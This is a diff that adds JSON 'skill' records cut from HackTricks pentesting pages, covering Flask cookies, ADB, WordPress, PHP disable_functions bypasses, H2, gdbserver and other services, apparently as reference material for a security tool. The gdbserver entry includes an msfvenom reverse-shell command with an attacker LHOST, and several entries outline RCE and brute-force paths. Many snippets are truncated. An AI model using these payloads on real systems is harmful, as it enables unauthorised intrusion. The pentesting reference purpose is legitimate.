+ "description": "# Flask\n\n{{#include ../../banners/hacktricks-training.md}}\n\n**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/index.html)**.**\n\n## Cookies\n\nDefault cookie session name is **`session`**.\n\n### Decoder\n\nOnline Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)\n\n#### Manual\n\nGet the first part of the cookie until the first point and ",
+ "payloads": [
+ "# Flask",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/index.html)**.**",
+ "## Cookies",
+ "Default cookie session name is **`session`**.",
+ "### Decoder",
+ "Online Flask coockies decoder: [https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)",
+ "#### Manual",
+ "Get the first part of the cookie until the first point and Base64 decode it>",
+ "```bash",
+ "echo \"ImhlbGxvIg\" | base64 -d",
+ "The cookie is also signed using a password",
+ "### **Flask-Unsign**",
+ "Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.",
+ "{{#ref}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/flask.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_db35cd496ed8.json b/skills/network_services_pentesting_db35cd496ed8.json
new file mode 100644
index 0000000..08c2971
--- /dev/null
+++ b/skills/network_services_pentesting_db35cd496ed8.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_db35cd496ed8",
+ "category": "network-services-pentesting",
+ "title": "5555 android debug bridge",
+ "description": "# 5555 - Android Debug Bridge\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFrom [the docs](https://developer.android.com/studio/command-line/adb):\n\nAndroid Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.\n\n- Historical default TCP port: 5555 (classic \"adb tcpip\" mode).\n- Modern Wireless debugging (Android 11+) use",
+ "payloads": [
+ "# 5555 - Android Debug Bridge",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "From [the docs](https://developer.android.com/studio/command-line/adb):",
+ "Android Debug Bridge (adb) is a command-line tool to communicate with Android-based devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.",
+ "- Historical default TCP port: 5555 (classic \"adb tcpip\" mode).",
+ "- Modern Wireless debugging (Android 11+) uses TLS pairing and mDNS service discovery. The connect port is dynamic and discovered via mDNS; it may not be 5555. Pairing is done with adb pair host:port followed by adb connect. See the notes below for offensive implications.",
+ "Example nmap fingerprint:",
+ "PORT STATE SERVICE VERSION",
+ "5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)",
+ "## Connect",
+ "If you find ADB exposed and reachable, try connecting and enumerating quickly:",
+ "```bash",
+ "adb connect [:] # Default is 5555 for classic mode",
+ "adb devices -l # Confirm it shows as \"device\" (not unauthorized/offline)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/5555-android-debug-bridge.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_db977260a345.json b/skills/network_services_pentesting_db977260a345.json
new file mode 100644
index 0000000..970bf84
--- /dev/null
+++ b/skills/network_services_pentesting_db977260a345.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_db977260a345",
+ "category": "network-services-pentesting",
+ "title": "wordpress",
+ "description": "# Wordpress\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\n- **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\n\n ",
+ "payloads": [
+ "# Wordpress",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "- **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`",
+ "- **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)",
+ "- **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)",
+ "- In **wp-config.php** you can find the root password of the database.",
+ "- Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_",
+ "### **Main WordPress Files**",
+ "- `index.php`",
+ "- `license.txt` contains useful information such as the version WordPress installed.",
+ "- `wp-activate.php` is used for the email activation process when setting up a new WordPress site.",
+ "- Login folders (may be renamed to hide it):",
+ "- `/wp-admin/login.php`",
+ "- `/wp-admin/wp-login.php`"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/wordpress.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_dce38c14e369.json b/skills/network_services_pentesting_dce38c14e369.json
new file mode 100644
index 0000000..7e37aab
--- /dev/null
+++ b/skills/network_services_pentesting_dce38c14e369.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_dce38c14e369",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass mod cgi",
+ "description": "# mod_cgi\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n\nFrom [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)\n\n```php\n\\n\";",
+ "if (!isset($_GET['checked']))",
+ "@file_put_contents('.htaccess', \"\\nSetEnv HTACCESS on\", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed",
+ "header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked",
+ "$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_dfd09890091d.json b/skills/network_services_pentesting_dfd09890091d.json
new file mode 100644
index 0000000..7deac98
--- /dev/null
+++ b/skills/network_services_pentesting_dfd09890091d.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_dfd09890091d",
+ "category": "network-services-pentesting",
+ "title": "smtp commands",
+ "description": "# SMTP - Commands\n\n{{#include ../../banners/hacktricks-training.md}}\n\n\n**Commands from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)\n\n**HELO**\\\nIt\u2019s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.\n\n**EHLO**\\\nAn alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.\n\n**MAIL FROM**\\\nWith this SMTP command the operations begin",
+ "payloads": [
+ "# SMTP - Commands",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "**Commands from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)",
+ "**HELO**\\",
+ "It\u2019s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.",
+ "**EHLO**\\",
+ "An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.",
+ "**MAIL FROM**\\",
+ "With this SMTP command the operations begin: the sender states the source email address in the \u201cFrom\u201d field and actually starts the email transfer.",
+ "**RCPT TO**\\",
+ "It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.",
+ "**SIZE**\\",
+ "This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.",
+ "**DATA**\\",
+ "With the DATA command the email content begins to be transferred; it\u2019s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-smtp/smtp-commands.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_e0867316681a.json b/skills/network_services_pentesting_e0867316681a.json
new file mode 100644
index 0000000..73ba9e1
--- /dev/null
+++ b/skills/network_services_pentesting_e0867316681a.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_e0867316681a",
+ "category": "network-services-pentesting",
+ "title": "h2 java sql database",
+ "description": "# H2 - Java SQL database\n\n{{#include ../../banners/hacktricks-training.md}}\n\nOfficial page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)\n\n## Access\n\nYou can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):\n\n.png>)\n\nOr if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that databa",
+ "payloads": [
+ "# H2 - Java SQL database",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)",
+ "## Access",
+ "You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):",
+ ".png>)",
+ "Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:",
+ ".png>)",
+ "_**Trick from box Hawk of HTB.**_",
+ "## **RCE**",
+ "Having access to communicate with the H2 database check this exploit to get RCE on it: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)",
+ "## H2 SQL Injection to RCE",
+ "In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) a payload is explained to get **RCE via a H2 database** abusing a **SQL Injection**.",
+ "```json",
+ "\"details\":"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_e0909af98f8f.json b/skills/network_services_pentesting_e0909af98f8f.json
new file mode 100644
index 0000000..29c4201
--- /dev/null
+++ b/skills/network_services_pentesting_e0909af98f8f.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_e0909af98f8f",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass dl function",
+ "description": "# Disable Functions Bypass - dl Function\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n**Important note:**\n\n\n\n**`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.\\\nHowever, it has some strict limitations:\n\n- The `dl` function must be **present** ",
+ "payloads": [
+ "# Disable Functions Bypass - dl Function",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "**Important note:**",
+ "",
+ "**`dl`** is a PHP function that can be used to load PHP extensions. It the function isn't disabled it could be abused to **bypass `disable_functions` and execute arbitrary commands**.\\",
+ "However, it has some strict limitations:",
+ "- The `dl` function must be **present** in the **environment** and **not disabled**",
+ "- The PHP Extension **must be compiled with the same major version** (PHP API version) that the server is using (you can see this information in the output of phpinfo)",
+ "- The PHP extension must be **located in the directory** that is **defined** by the **`extension_dir`** directive (you can see it in the output of phpinfo). It's very unprobeable that an attacker trying to abuse the server will have write access over this directory, so this requirement probably will prevent you to abuse this technique).",
+ "**If you meet these requirements, continue reading the post** [**https://antichat.com/threads/70763/**](https://antichat.com/threads/70763/) **to learn how to bypass disable_functions**. Here is a summary:",
+ "The [dl function](http://www.php.net/manual/en/function.dl.php) is used to load PHP extensions dynamically during script execution. PHP extensions, typically written in C/C++, enhance PHP's functionality. The attacker, upon noticing the `dl` function is not disabled, decides to create a custom PHP extension to execute system commands.",
+ "### Steps Taken by the Attacker:",
+ "1. **PHP Version Identification:**",
+ "- The attacker determines the PHP version using a script (``).",
+ "2. **PHP Source Acquisition:**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_e4117f61a634.json b/skills/network_services_pentesting_e4117f61a634.json
new file mode 100644
index 0000000..69aecb3
--- /dev/null
+++ b/skills/network_services_pentesting_e4117f61a634.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_e4117f61a634",
+ "category": "network-services-pentesting",
+ "title": "pentesting remote gdbserver",
+ "description": "# Pentesting Remote GdbServer\n\n{{#include ../banners/hacktricks-training.md}}\n\n\n## **Basic Information**\n\n**gdbserver** is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the \"target.\" This setup allows the **GNU Debugger** to connect from a different machine, the \"host,\" where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be ma",
+ "payloads": [
+ "# Pentesting Remote GdbServer",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## **Basic Information**",
+ "**gdbserver** is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the \"target.\" This setup allows the **GNU Debugger** to connect from a different machine, the \"host,\" where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups.",
+ "You can make a **gdbserver listen in any port** and at the moment **nmap is not capable of recognising the service**.",
+ "## Exploitation",
+ "### Upload and Execute",
+ "You can easily create an **elf backdoor with msfvenom**, upload it and execute is:",
+ "```bash",
+ "# Trick shared by @B1n4rySh4d0w",
+ "msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf",
+ "chmod +x binary.elf",
+ "gdb binary.elf",
+ "# Set remote debuger target",
+ "target extended-remote 10.10.10.11:1337"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-remote-gdbserver.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_e7bbf3beef2b.json b/skills/network_services_pentesting_e7bbf3beef2b.json
new file mode 100644
index 0000000..d7ac89c
--- /dev/null
+++ b/skills/network_services_pentesting_e7bbf3beef2b.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_e7bbf3beef2b",
+ "category": "network-services-pentesting",
+ "title": "custom protocols",
+ "description": "# Custom UDP RPC Enumeration & File-Transfer Abuse\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Mapping proprietary RPC objects with Frida\n\nOlder multiplayer titles often embed home-grown RPC stacks on top of UDP. In *Anno 1404: Venice* this is implemented inside `NetComEngine3.dll` via the `RMC_CallMessage` dispatcher, which parses 5 fields from every datagram:\n\n| Field | Purpose |\n| --- | --- |\n| `ID` | RPC verb (16-bit) |\n| `Flags` | Transport modifiers (reliability, ordering) |\n| `",
+ "payloads": [
+ "# Custom UDP RPC Enumeration & File-Transfer Abuse",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Mapping proprietary RPC objects with Frida",
+ "Older multiplayer titles often embed home-grown RPC stacks on top of UDP. In *Anno 1404: Venice* this is implemented inside `NetComEngine3.dll` via the `RMC_CallMessage` dispatcher, which parses 5 fields from every datagram:",
+ "| Field | Purpose |",
+ "| --- | --- |",
+ "| `ID` | RPC verb (16-bit) |",
+ "| `Flags` | Transport modifiers (reliability, ordering) |",
+ "| `Source` | Object ID of the caller |",
+ "| `TargetObject` | Remote object instance |",
+ "| `Method` | Method index inside the target class |",
+ "Two helper functions \u2013 `ClassToMethodName()` and `TargetName()` \u2013 translate raw IDs into human-readable strings for logging. By brute-forcing 24\u2011bit object IDs and 16\u2011bit method IDs and calling those helpers we can enumerate the entire remotely reachable surface without traffic captures or symbol leaks.",
+ "",
+ "Frida surface enumerator (trimmed)",
+ "```javascript"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/custom-protocols.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ea5156f35e34.json b/skills/network_services_pentesting_ea5156f35e34.json
new file mode 100644
index 0000000..3468281
--- /dev/null
+++ b/skills/network_services_pentesting_ea5156f35e34.json
@@ -0,0 +1,21 @@
+{
+ "id": "network_services_pentesting_ea5156f35e34",
+ "category": "network-services-pentesting",
+ "title": "firebase database",
+ "description": "# Firebase Database\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## What is Firebase\n\nFirebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end.\n\nLearn more about Firebase in:\n\n\n{{#ref}}\nhttps://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum",
+ "payloads": [
+ "# Firebase Database",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## What is Firebase",
+ "Firebase is a Backend-as-a-Services mainly for mobile application. It is focused on removing the charge of programming the back-end providing a nice SDK as well as many other interesting things that facilitates the interaction between the application and the back-end.",
+ "Learn more about Firebase in:",
+ "{{#ref}}",
+ "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html",
+ "{{#endref}}",
+ "{{#include ../../../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ec1b70324e3c.json b/skills/network_services_pentesting_ec1b70324e3c.json
new file mode 100644
index 0000000..755c903
--- /dev/null
+++ b/skills/network_services_pentesting_ec1b70324e3c.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ec1b70324e3c",
+ "category": "network-services-pentesting",
+ "title": "disable functions bypass php fpm fastcgi",
+ "description": "# disable_functions bypass - php-fpm/FastCGI\n\n{{#include ../../../../banners/hacktricks-training.md}}\n\n## PHP-FPM\n\n**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service ",
+ "payloads": [
+ "# disable_functions bypass - php-fpm/FastCGI",
+ "{{#include ../../../../banners/hacktricks-training.md}}",
+ "## PHP-FPM",
+ "**PHP-FPM** is presented as a **superior alternative** to the standard PHP FastCGI, offering features that are particularly **beneficial for websites with high traffic**. It operates through a master process that oversees a collection of worker processes. For a PHP script request, it's the web server that initiates a **FastCGI proxy connection to the PHP-FPM service**. This service has the capability to **receive requests either via network ports on the server or Unix sockets**.",
+ "Despite the intermediary role of the proxy connection, PHP-FPM needs to be operational on the same machine as the web server. The connection it uses, while proxy-based, differs from conventional proxy connections. Upon receiving a request, an available worker from PHP-FPM processes it\u2014executing the PHP script and then forwarding the results back to the web server. After a worker concludes processing a request, it becomes available again for upcoming requests.",
+ "## But what is CGI and FastCGI?",
+ "### CGI",
+ "Normally web pages, files and all of the documents which are transferred from the web server to the browser are stored in a specific public directory such as home/user/public_html. **When the browser requests certain content, the server checks this directory and sends the required file to the browse**r.",
+ "If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.",
+ "For example, when the CGI script [http://mysitename.com/**cgi-bin/file.pl**](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. (explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html))",
+ "### FastCGI",
+ "[FastCGI](https://en.wikipedia.org/wiki/FastCGI) is a newer web technology, an improved [CGI](http://en.wikipedia.org/wiki/Common_Gateway_Interface) version as the main functionality remains the same.",
+ "The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI \u2013 a high performance version of the CGI technology with enhanced capabilities.**",
+ "## disable_functions bypass",
+ "It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ee6154115e84.json b/skills/network_services_pentesting_ee6154115e84.json
new file mode 100644
index 0000000..c71d2bd
--- /dev/null
+++ b/skills/network_services_pentesting_ee6154115e84.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ee6154115e84",
+ "category": "network-services-pentesting",
+ "title": "pentesting ssh",
+ "description": "# 22 - Pentesting SSH/SFTP\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\n**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.\n\n**Default port:** 22\n\n```\n22/tcp open ssh syn-ack\n```\n\n**SSH servers:**\n\n- [openSSH](http://www.openssh.org) \u2013 OpenBSD SSH, shipped in BSD, Linux dis",
+ "payloads": [
+ "# 22 - Pentesting SSH/SFTP",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.",
+ "**Default port:** 22",
+ "22/tcp open ssh syn-ack",
+ "**SSH servers:**",
+ "- [openSSH](http://www.openssh.org) \u2013 OpenBSD SSH, shipped in BSD, Linux distributions and Windows since Windows 10",
+ "- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) \u2013 SSH implementation for environments with low memory and processor resources, shipped in OpenWrt",
+ "- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) \u2013 SSH implementation for Windows, the client is commonly used but the use of the server is rarer",
+ "- [CopSSH](https://www.itefix.net/copssh) \u2013 implementation of OpenSSH for Windows",
+ "**SSH libraries (implementing server-side):**",
+ "- [libssh](https://www.libssh.org) \u2013 multiplatform C library implementing the SSHv2 protocol with bindings in [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) and [R](https://github.com/ropensci/ssh); it\u2019s used by KDE for sftp and by GitHub for the git SSH infrastructure",
+ "- [wolfSSH](https://www.wolfssl.com/products/wolfssh/) \u2013 SSHv2 server library written in ANSI C and targeted for embedded, RTOS, and resource-constrained environments",
+ "- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) \u2013 Apache SSHD java library is based on Apache MINA"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-ssh.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_ef558ca3b9b7.json b/skills/network_services_pentesting_ef558ca3b9b7.json
new file mode 100644
index 0000000..0a7830a
--- /dev/null
+++ b/skills/network_services_pentesting_ef558ca3b9b7.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_ef558ca3b9b7",
+ "category": "network-services-pentesting",
+ "title": "1521 1522 1529 pentesting oracle listener",
+ "description": "# 1521,1522-1529 - Pentesting Oracle TNS Listener\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nOracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)).\n\nWhen enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522\u20131529-).\n\n```\n1521/tcp open ",
+ "payloads": [
+ "# 1521,1522-1529 - Pentesting Oracle TNS Listener",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)).",
+ "When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522\u20131529-).",
+ "1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)",
+ "1748/tcp open oracle-tns Oracle TNS Listener",
+ "## Summary",
+ "1. **Version Enumeration**: Identify version information to search for known vulnerabilities.",
+ "2. **TNS Listener Bruteforce**: Sometimes necessary to establish communication.",
+ "3. **SID Name Enumeration/Bruteforce**: Discover database names (SID).",
+ "4. **Credential Bruteforce**: Attempt to access discovered SID.",
+ "5. **Code Execution**: Attempt to run code on the system.",
+ "In order to user MSF oracle modules you need to install some dependencies: [**Installation**](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)",
+ "## Posts"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f14c818b3258.json b/skills/network_services_pentesting_f14c818b3258.json
new file mode 100644
index 0000000..1626c78
--- /dev/null
+++ b/skills/network_services_pentesting_f14c818b3258.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f14c818b3258",
+ "category": "network-services-pentesting",
+ "title": "7 tcp udp pentesting echo",
+ "description": "# 7/tcp/udp - Pentesting Echo Service\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nAn echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\\\n**It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number",
+ "payloads": [
+ "# 7/tcp/udp - Pentesting Echo Service",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "An echo service is running on this host. The echo service was intended for testing and measurement purposes and may listen on both TCP and UDP protocols. The server sends back any data it receives, with no modification.\\",
+ "**It's possible to cause a denial of service by connecting the a echo service to the echo service on the same or another machine**. Because of the excessively high number of packets produced, the affected machines may be effectively taken out of service.\\",
+ "Info from [https://www.acunetix.com/vulnerabilities/web/echo-service-running/](https://www.acunetix.com/vulnerabilities/web/echo-service-running/)",
+ "**Default Port:** 7/tcp/udp",
+ "PORT STATE SERVICE",
+ "7/udp open echo",
+ "7/tcp open echo",
+ "## Contact Echo service (UDP)",
+ "```bash",
+ "nc -uvn 7",
+ "Hello echo #This is wat you send",
+ "Hello echo #This is the response"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/7-tcp-udp-pentesting-echo.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f166c31bd4bf.json b/skills/network_services_pentesting_f166c31bd4bf.json
new file mode 100644
index 0000000..c765440
--- /dev/null
+++ b/skills/network_services_pentesting_f166c31bd4bf.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f166c31bd4bf",
+ "category": "network-services-pentesting",
+ "title": "pentesting rsh",
+ "description": "# 514 - Pentesting Rsh\n\n{{#include ../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFor authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.\n\nMoreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Net",
+ "payloads": [
+ "# 514 - Pentesting Rsh",
+ "{{#include ../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "For authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.",
+ "Moreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.",
+ "**Default port**: 514",
+ "## Login",
+ "rsh ",
+ "rsh -l domain\\user ",
+ "rsh domain/user@",
+ "rsh domain\\\\user@",
+ "### [**Brute Force**](../generic-hacking/brute-force.md#rsh)",
+ "## References",
+ "- [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)",
+ "{{#include ../banners/hacktricks-training.md}}"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/network-services-pentesting/pentesting-rsh.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/network_services_pentesting_f1fa8fa13e61.json b/skills/network_services_pentesting_f1fa8fa13e61.json
new file mode 100644
index 0000000..4806c68
--- /dev/null
+++ b/skills/network_services_pentesting_f1fa8fa13e61.json
@@ -0,0 +1,27 @@
+{
+ "id": "network_services_pentesting_f1fa8fa13e61",
